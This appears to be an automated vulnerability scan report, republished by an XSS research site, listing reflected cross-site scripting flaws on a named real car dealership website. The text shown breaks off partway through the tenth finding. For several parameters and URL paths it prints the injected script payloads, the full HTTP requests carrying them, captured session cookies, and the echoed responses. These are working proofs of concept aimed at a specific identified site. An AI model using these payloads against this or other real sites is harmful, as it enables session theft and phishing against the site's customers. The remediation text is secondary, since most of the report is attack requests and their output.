XSS, DORK, theautomastermercedesbenz.com, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sun Apr 17 09:18:33 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. Cross-site scripting (reflected)

1.1. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [REST URL parameter 1]

1.2. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [SBbodystyle parameter]

1.3. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [SBmake parameter]

1.4. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [SBmodel parameter]

1.5. http://www.theautomastermercedesbenz.com/dealership/about.htm [REST URL parameter 1]

1.6. http://www.theautomastermercedesbenz.com/financing/index.htm [REST URL parameter 1]

1.7. http://www.theautomastermercedesbenz.com/linkout/index.htm [REST URL parameter 1]

1.8. http://www.theautomastermercedesbenz.com/linkout/index.htm [url parameter]

1.9. http://www.theautomastermercedesbenz.com/new-inventory/index.htm [REST URL parameter 1]

1.10. http://www.theautomastermercedesbenz.com/specials/finance.htm [REST URL parameter 1]

1.11. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [REST URL parameter 1]

1.12. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [SBbodystyle parameter]

1.13. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [SBmake parameter]

1.14. http://www.theautomastermercedesbenz.com/used-inventory/index.htm [SBmodel parameter]

1.15. http://www.theautomastermercedesbenz.com/ [Referer HTTP header]

1.16. http://www.theautomastermercedesbenz.com/ [Referer HTTP header]

1.17. http://www.theautomastermercedesbenz.com/index.htm [Referer HTTP header]

1.18. http://www.theautomastermercedesbenz.com/index.htm [Referer HTTP header]

2. Cookie without HttpOnly flag set

3. Referer-dependent response

4. Cross-domain Referer leakage

4.1. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm

4.2. http://www.theautomastermercedesbenz.com/linkout/index.htm

4.3. http://www.theautomastermercedesbenz.com/new-inventory/index.htm

4.4. http://www.theautomastermercedesbenz.com/used-inventory/index.htm

5. Cross-domain script include

5.1. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm

5.2. http://www.theautomastermercedesbenz.com/dealership/about.htm

5.3. http://www.theautomastermercedesbenz.com/financing/index.htm

5.4. http://www.theautomastermercedesbenz.com/index.htm

5.5. http://www.theautomastermercedesbenz.com/linkout/index.htm

5.6. http://www.theautomastermercedesbenz.com/new-inventory/index.htm

5.7. http://www.theautomastermercedesbenz.com/specials/finance.htm

5.8. http://www.theautomastermercedesbenz.com/used-inventory/index.htm



1. Cross-site scripting (reflected)  next
There are 18 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /certified-inventory/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34888"><script>alert(1)</script>721f99e013c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /certified-inventory34888"><script>alert(1)</script>721f99e013c/index.htm?reset=InventoryListing HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.3.8.1302976680881

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14378
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:58:44 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/certified-inventory34888"><script>alert(1)</script>721f99e013c/index.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

1.2. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [SBbodystyle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /certified-inventory/index.htm

Issue detail

The value of the SBbodystyle request parameter is copied into the HTML document as plain text between tags. The payload 5c46c<script>alert(1)</script>0f97ee897e7 was submitted in the SBbodystyle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /certified-inventory/index.htm?SByear=clear&SBmake=BMW&SBmodel=clear&SBbodystyle=clear5c46c<script>alert(1)</script>0f97ee897e7&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/certified-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.5.8.1302976687612

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:58:17 GMT
Connection: close
Cache-Control: no-store
Content-Length: 36775

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Certified preowned vehicles: buy a used car, truck, SUV, automobile</title>
   <meta http-e
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no BMW clear5c46c<script>alert(1)</script>0f97ee897e7 Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...

1.3. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [SBmake parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /certified-inventory/index.htm

Issue detail

The value of the SBmake request parameter is copied into the HTML document as plain text between tags. The payload 1bd3e<script>alert(1)</script>56a64775370 was submitted in the SBmake parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /certified-inventory/index.htm?SByear=clear&SBmake=BMW1bd3e<script>alert(1)</script>56a64775370&SBmodel=clear&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/certified-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.5.8.1302976687612

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:58:07 GMT
Connection: close
Cache-Control: no-store
Content-Length: 36649

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Certified preowned vehicles: buy a used car, truck, SUV, automobile</title>
   <meta http-e
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no BMW1bd3e<script>alert(1)</script>56a64775370 Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...

1.4. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [SBmodel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /certified-inventory/index.htm

Issue detail

The value of the SBmodel request parameter is copied into the HTML document as plain text between tags. The payload 24ae3<script>alert(1)</script>9446c4033ba was submitted in the SBmodel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /certified-inventory/index.htm?SByear=clear&SBmake=BMW&SBmodel=clear24ae3<script>alert(1)</script>9446c4033ba&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/certified-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.5.8.1302976687612

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:58:12 GMT
Connection: close
Cache-Control: no-store
Content-Length: 36832

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Certified preowned vehicles: buy a used car, truck, SUV, automobile</title>
   <meta http-e
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no BMW clear24ae3<script>alert(1)</script>9446c4033ba Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...

1.5. http://www.theautomastermercedesbenz.com/dealership/about.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /dealership/about.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adac1"><script>alert(1)</script>b126d4f3216 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dealershipadac1"><script>alert(1)</script>b126d4f3216/about.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.30.7.1302974169538

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14369
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:16:39 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/dealershipadac1"><script>alert(1)</script>b126d4f3216/about.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

1.6. http://www.theautomastermercedesbenz.com/financing/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /financing/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ad6"><script>alert(1)</script>1eed9a4dd1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /financingb7ad6"><script>alert(1)</script>1eed9a4dd1b/index.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f439ee10a0a002f005f07e8e85727f2; JSESSIONID=cywj1cs5gwvm; ddcpoolid=CmsPoolO; __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.5.6.1302973388995

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14278
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:05:52 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://theautomaster.com/index.htm&amp;20=www.theautomastermercedesbenz.com&amp;21=/financingb7ad6"><script>alert(1)</script>1eed9a4dd1b/index.htm&amp;50=5f439ee10a0a002f005f07e8e85727f2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

1.7. http://www.theautomastermercedesbenz.com/linkout/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /linkout/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6bc8"><script>alert(1)</script>504fe4ad92d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /linkoutc6bc8"><script>alert(1)</script>504fe4ad92d/index.htm?url=http://www.dealer.com HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.26.9.1302973849681

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14366
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:11:28 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
mg src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/linkoutc6bc8"><script>alert(1)</script>504fe4ad92d/index.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

1.8. http://www.theautomastermercedesbenz.com/linkout/index.htm [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /linkout/index.htm

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6ea4'%3balert(1)//ee04aa6c904 was submitted in the url parameter. This input was echoed as f6ea4';alert(1)//ee04aa6c904 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /linkout/index.htm?url=http://www.dealer.comf6ea4'%3balert(1)//ee04aa6c904 HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.26.9.1302973849681

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:10:39 GMT
Connection: close
Content-Length: 18132

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<![CDATA[*/
           
   jQuery(function () {
       $('#linkOutLink').click(function () {
           var onTrack = function () { document.location.href = 'http://www.dealer.comf6ea4';alert(1)//ee04aa6c904'; };

           $(this).unbind('click').html('<span>
...[SNIP]...

1.9. http://www.theautomastermercedesbenz.com/new-inventory/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /new-inventory/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6623"><script>alert(1)</script>fdaaeb1000e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-inventorya6623"><script>alert(1)</script>fdaaeb1000e/index.htm?reset=InventoryListing HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/financing/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f439ee10a0a002f005f07e8e85727f2; JSESSIONID=cywj1cs5gwvm; ddcpoolid=CmsPoolO; __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; __utma=124194511.1620789493.1302973377.1302973377.1302973377.1; __utmc=124194511; __utmb=124194511.10.3.1302973397616

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14282
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:08:08 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://theautomaster.com/index.htm&amp;20=www.theautomastermercedesbenz.com&amp;21=/new-inventorya6623"><script>alert(1)</script>fdaaeb1000e/index.htm&amp;50=5f439ee10a0a002f005f07e8e85727f2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

1.10. http://www.theautomastermercedesbenz.com/specials/finance.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /specials/finance.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84e55"><script>alert(1)</script>ddb4d93f836 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials84e55"><script>alert(1)</script>ddb4d93f836/finance.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/used-inventory/index.htm?SByear=clear&SBmake=Mercedes-Benz&SBmodel=clear&SBbodystyle=clear&SBprice=clear
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
